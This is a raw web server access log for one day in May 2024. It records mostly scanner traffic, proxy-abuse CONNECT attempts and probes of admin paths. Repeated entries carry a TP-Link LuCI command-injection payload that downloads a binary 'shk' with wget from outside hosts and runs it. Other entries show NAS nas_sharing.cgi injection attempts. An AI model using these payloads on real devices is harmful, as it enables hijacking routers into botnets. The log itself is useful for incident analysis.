183.81.169.139 - - [09/May/2024:00:04:09 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F14.225.204.172%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 141.98.11.15 - - [09/May/2024:00:30:47 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 80.75.212.37 - - [09/May/2024:00:36:07 +0200] "CONNECT api64.ipify.org:443 HTTP/1.1" 400 804 87.121.69.25 - - [09/May/2024:00:40:56 +0200] "CONNECT api.rev.pm:443 HTTP/1.1" 400 804 87.121.69.52 - - [09/May/2024:01:27:19 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 183.81.169.139 - - [09/May/2024:02:29:48 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F14.225.204.172%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 64.62.156.51 - - [09/May/2024:02:36:20 +0200] "GET / HTTP/1.1" 200 1895 64.62.156.51 - - [09/May/2024:02:36:42 +0200] "GET /favicon.ico HTTP/1.1" 404 729 64.62.156.42 - - [09/May/2024:02:36:54 +0200] "GET /?format=json HTTP/1.1" 200 1895 64.62.156.50 - - [09/May/2024:02:36:58 +0200] "CONNECT www.shadowserver.org:443 HTTP/1.1" 400 804 80.75.212.75 - - [09/May/2024:02:46:03 +0200] "CONNECT www.google.com:443 HTTP/1.1" 400 804 45.142.182.70 - - [09/May/2024:02:58:36 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F14.225.204.172%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 91.92.245.67 - - [09/May/2024:02:59:21 +0200] "CONNECT api.ipify.org:443 HTTP/1.1" 400 804 195.1.144.107 - - [09/May/2024:03:25:04 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F14.225.204.172%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 87.121.69.25 - - [09/May/2024:03:30:36 +0200] "CONNECT api.rev.pm:443 HTTP/1.1" 400 804 80.75.212.37 - - [09/May/2024:04:08:05 +0200] "CONNECT api64.ipify.org:443 HTTP/1.1" 400 804 205.210.31.46 - - [09/May/2024:04:52:49 +0200] "GET / HTTP/1.1" 200 1895 195.1.144.109 - - [09/May/2024:04:56:26 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F14.225.204.172%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 46.101.77.59 - - [09/May/2024:05:13:28 +0200] "-" 400 1930 46.101.77.59 - - [09/May/2024:05:13:28 +0200] "-" 400 1930 46.101.77.59 - - [09/May/2024:05:13:28 +0200] "-" 400 1930 46.101.77.59 - - [09/May/2024:05:13:29 +0200] "-" 400 1930 46.101.77.59 - - [09/May/2024:05:13:29 +0200] "-" 400 1930 46.101.77.59 - - [09/May/2024:05:13:29 +0200] "-" 400 1930 46.101.77.59 - - [09/May/2024:05:13:29 +0200] "-" 400 1930 46.101.77.59 - - [09/May/2024:05:13:30 +0200] "-" 400 1930 46.101.77.59 - - [09/May/2024:05:13:30 +0200] "-" 400 1930 46.101.77.59 - - [09/May/2024:05:13:30 +0200] "-" 400 1930 46.101.77.59 - - [09/May/2024:05:14:26 +0200] "-" 400 1930 46.101.77.59 - - [09/May/2024:05:14:26 +0200] "-" 400 1930 46.101.77.59 - - [09/May/2024:05:14:26 +0200] "-" 400 1930 46.101.77.59 - - [09/May/2024:05:14:26 +0200] "-" 400 1930 46.101.77.59 - - [09/May/2024:05:14:26 +0200] "-" 400 1930 46.101.77.59 - - [09/May/2024:05:14:27 +0200] "-" 400 1930 46.101.77.59 - - [09/May/2024:05:14:27 +0200] "-" 400 1930 46.101.77.59 - - [09/May/2024:05:14:27 +0200] "-" 400 1930 46.101.77.59 - - [09/May/2024:05:14:27 +0200] "-" 400 1930 46.101.77.59 - - [09/May/2024:05:14:27 +0200] "-" 400 1930 206.168.32.3 - - [09/May/2024:05:52:39 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.3 - - [09/May/2024:05:52:42 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.3 - - [09/May/2024:05:52:43 +0200] "GET /favicon.ico HTTP/1.1" 404 729 34.84.22.125 - - [09/May/2024:05:58:48 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 103.116.39.96 - - [09/May/2024:06:29:56 +0200] "CONNECT www.google.com:443 HTTP/1.1" 400 804 87.121.69.25 - - [09/May/2024:07:00:53 +0200] "CONNECT api.rev.pm:443 HTTP/1.1" 400 804 91.92.251.254 - - [09/May/2024:07:01:35 +0200] "CONNECT 45.61.137.126:7227 HTTP/1.1" 400 804 198.199.113.61 - - [09/May/2024:07:10:55 +0200] "GET /actuator/health HTTP/1.1" 404 737 45.32.236.225 - - [09/May/2024:07:20:42 +0200] "CONNECT api.ipify.org:443 HTTP/1.1" 400 804 45.32.236.225 - - [09/May/2024:07:20:42 +0200] "CONNECT api.ipify.org:443 HTTP/1.1" 400 804 80.75.212.37 - - [09/May/2024:07:31:28 +0200] "CONNECT api64.ipify.org:443 HTTP/1.1" 400 804 87.121.69.52 - - [09/May/2024:07:35:53 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 45.142.182.70 - - [09/May/2024:07:46:21 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F173.44.139.198%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 183.81.169.139 - - [09/May/2024:07:56:51 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F173.44.139.198%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 179.43.188.106 - - [09/May/2024:07:59:45 +0200] "GET / HTTP/1.1" 200 1895 141.98.11.15 - - [09/May/2024:08:07:48 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 206.168.32.3 - - [09/May/2024:09:15:43 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.3 - - [09/May/2024:09:15:46 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.3 - - [09/May/2024:09:15:47 +0200] "GET /favicon.ico HTTP/1.1" 404 729 87.121.69.25 - - [09/May/2024:09:23:55 +0200] "CONNECT api.rev.pm:443 HTTP/1.1" 400 804 159.223.203.97 - - [09/May/2024:09:50:39 +0200] "-" 400 1930 179.43.188.106 - - [09/May/2024:10:31:39 +0200] "GET / HTTP/1.1" 200 1895 93.123.85.43 - - [09/May/2024:10:45:10 +0200] "GET /config/getuser?index=0 HTTP/1.1" 404 736 152.32.181.210 - - [09/May/2024:10:51:41 +0200] "-" 400 1930 152.32.181.210 - - [09/May/2024:10:51:52 +0200] "GET / HTTP/1.1" 200 1895 152.32.181.210 - - [09/May/2024:10:52:11 +0200] "GET /favicon.ico HTTP/1.1" 404 729 152.32.181.210 - - [09/May/2024:10:52:12 +0200] "GET /robots.txt HTTP/1.1" 404 728 152.32.181.210 - - [09/May/2024:10:52:13 +0200] "GET /sitemap.xml HTTP/1.1" 404 729 45.142.182.70 - - [09/May/2024:11:10:20 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F173.44.139.198%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 80.75.212.37 - - [09/May/2024:11:11:02 +0200] "CONNECT api64.ipify.org:443 HTTP/1.1" 400 804 44.220.188.82 - - [09/May/2024:11:16:55 +0200] "GET / HTTP/1.1" 200 1895 183.81.169.139 - - [09/May/2024:11:53:38 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F173.44.139.198%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 179.43.188.106 - - [09/May/2024:12:05:50 +0200] "GET / HTTP/1.1" 200 1895 94.156.66.82 - - [09/May/2024:12:13:18 +0200] "CONNECT 185.65.245.140:7227 HTTP/1.1" 400 804 185.191.126.213 - - [09/May/2024:12:23:49 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+/tmp;+rm+-rf+shk;+wget+http://103.149.86.202/shk;+chmod+777+shk;+./shk+tplink;+rm+-rf+shk) HTTP/1.1" 404 756 87.121.69.25 - - [09/May/2024:12:24:09 +0200] "CONNECT api.rev.pm:443 HTTP/1.1" 400 804 198.235.24.252 - - [09/May/2024:12:58:59 +0200] "-" 400 1930 198.235.24.252 - - [09/May/2024:12:58:59 +0200] "-" 400 1930 80.75.212.75 - - [09/May/2024:13:02:29 +0200] "CONNECT www.google.com:443 HTTP/1.1" 400 804 174.138.61.44 - - [09/May/2024:13:27:24 +0200] "GET / HTTP/1.1" 200 1895 174.138.61.44 - - [09/May/2024:13:27:24 +0200] "-" 400 1930 87.121.69.52 - - [09/May/2024:13:33:32 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 179.43.188.106 - - [09/May/2024:13:40:13 +0200] "GET / HTTP/1.1" 200 1895 87.121.69.25 - - [09/May/2024:13:44:43 +0200] "CONNECT api.rev.pm:443 HTTP/1.1" 400 804 65.49.1.62 - - [09/May/2024:13:58:28 +0200] "-" 400 1930 80.75.212.37 - - [09/May/2024:14:21:20 +0200] "CONNECT api64.ipify.org:443 HTTP/1.1" 400 804 141.98.11.15 - - [09/May/2024:14:23:24 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 185.16.38.111 - - [09/May/2024:14:44:44 +0200] "GET / HTTP/1.1" 200 1895 185.216.71.4 - - [09/May/2024:14:52:57 +0200] "CONNECT pro.ip-api.com:443 HTTP/1.1" 400 804 185.216.71.4 - - [09/May/2024:14:52:57 +0200] "-" 400 1930 157.119.249.159 - - [09/May/2024:14:58:43 +0200] "CONNECT www.google.com:443 HTTP/1.1" 400 804 176.41.219.230 - - [09/May/2024:15:05:02 +0200] "GET / HTTP/1.0" 200 1895 180.93.172.203 - - [09/May/2024:15:05:59 +0200] "CONNECT www.google.com:443 HTTP/1.1" 400 804 206.168.32.3 - - [09/May/2024:15:14:14 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.3 - - [09/May/2024:15:14:17 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.3 - - [09/May/2024:15:14:17 +0200] "GET /favicon.ico HTTP/1.1" 404 729 91.92.245.67 - - [09/May/2024:15:15:01 +0200] "CONNECT api.ipify.org:443 HTTP/1.1" 400 804 179.43.188.106 - - [09/May/2024:15:30:41 +0200] "GET / HTTP/1.1" 200 1895 87.121.69.25 - - [09/May/2024:15:48:14 +0200] "CONNECT api.rev.pm:443 HTTP/1.1" 400 804 103.245.236.120 - - [09/May/2024:16:10:33 +0200] "GET /.most/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&system=cHMJfAlncmVwCW15ZGxpbms= HTTP/1.1" 404 743 103.245.236.120 - - [09/May/2024:16:10:33 +0200] "GET /cgi-bin/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&system=cHMJfAlncmVwCW15ZGxpbms= HTTP/1.1" 404 745 103.245.236.120 - - [09/May/2024:16:10:33 +0200] "GET /cgi-bin/orospucoc.cgi?user=messagebus&passwd=&cmd=15&system=cHMJfAlncmVwCW15ZGxpbms= HTTP/1.1" 404 743 103.245.236.120 - - [09/May/2024:16:10:34 +0200] "GET /.most/orospucoc.cgi?user=messagebus&passwd=&cmd=15&system=cHMJfAlncmVwCW15ZGxpbms= HTTP/1.1" 404 741 45.32.236.225 - - [09/May/2024:16:43:02 +0200] "CONNECT api.ipify.org:443 HTTP/1.1" 400 804 45.32.236.225 - - [09/May/2024:16:43:02 +0200] "CONNECT api.ipify.org:443 HTTP/1.1" 400 804 207.167.67.66 - - [09/May/2024:17:04:33 +0200] "CONNECT www.google.com:443 HTTP/1.1" 400 804 179.43.188.106 - - [09/May/2024:17:27:50 +0200] "GET / HTTP/1.1" 200 1895 198.199.115.122 - - [09/May/2024:17:30:22 +0200] "GET /hudson HTTP/1.1" 404 724 80.75.212.37 - - [09/May/2024:17:33:21 +0200] "CONNECT api64.ipify.org:443 HTTP/1.1" 400 804 45.142.182.70 - - [09/May/2024:17:37:31 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F173.44.139.198%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 207.167.67.66 - - [09/May/2024:17:42:30 +0200] "CONNECT www.google.com:443 HTTP/1.1" 400 804 87.121.69.25 - - [09/May/2024:17:48:27 +0200] "CONNECT api.rev.pm:443 HTTP/1.1" 400 804 183.61.189.152 - - [09/May/2024:17:49:57 +0200] "GET /manager/html HTTP/1.1" 401 2499 179.43.188.106 - - [09/May/2024:18:45:08 +0200] "GET / HTTP/1.1" 200 1895 80.76.49.132 - - [09/May/2024:18:51:43 +0200] "CONNECT 193.149.189.126:7227 HTTP/1.1" 400 804 92.118.57.249 - - [09/May/2024:19:13:14 +0200] "CONNECT www.google.com:443 HTTP/1.1" 400 804 87.121.69.52 - - [09/May/2024:19:19:44 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 87.236.176.43 - - [09/May/2024:19:45:29 +0200] "GET / HTTP/1.1" 200 1895 59.89.165.34 - - [09/May/2024:20:47:02 +0200] "GET / HTTP/1.1" 200 1895 59.89.165.34 - - [09/May/2024:20:47:02 +0200] "GET / HTTP/1.1" 200 1895 179.43.188.106 - - [09/May/2024:20:52:04 +0200] "GET / HTTP/1.1" 200 1895 87.121.69.25 - - [09/May/2024:20:54:35 +0200] "CONNECT api.rev.pm:443 HTTP/1.1" 400 804 192.241.196.109 - - [09/May/2024:21:16:14 +0200] "GET / HTTP/1.1" 200 1895 35.202.9.133 - - [09/May/2024:21:47:17 +0200] "GET / HTTP/1.1" 200 1895 80.82.77.33 - - [09/May/2024:22:04:19 +0200] "GET / HTTP/1.1" 200 1895 80.82.77.33 - - [09/May/2024:22:04:19 +0200] "GET /favicon.ico HTTP/1.1" 404 729 71.67.206.82 - - [09/May/2024:22:21:21 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 400 771 213.45.12.161 - - [09/May/2024:22:22:07 +0200] "GET / HTTP/1.1" 200 1895 78.108.177.54 - - [09/May/2024:22:22:44 +0200] "GET / HTTP/1.0" 200 1895 1.234.136.11 - - [09/May/2024:22:52:00 +0200] "GET / HTTP/1.1" 200 1895 141.98.11.15 - - [09/May/2024:22:57:48 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 206.168.32.3 - - [09/May/2024:23:01:59 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.3 - - [09/May/2024:23:02:02 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.3 - - [09/May/2024:23:02:02 +0200] "GET /favicon.ico HTTP/1.1" 404 729 87.121.69.25 - - [09/May/2024:23:13:05 +0200] "CONNECT api.rev.pm:443 HTTP/1.1" 400 804 178.165.112.168 - - [09/May/2024:23:43:29 +0200] "GET / HTTP/1.1" 200 1895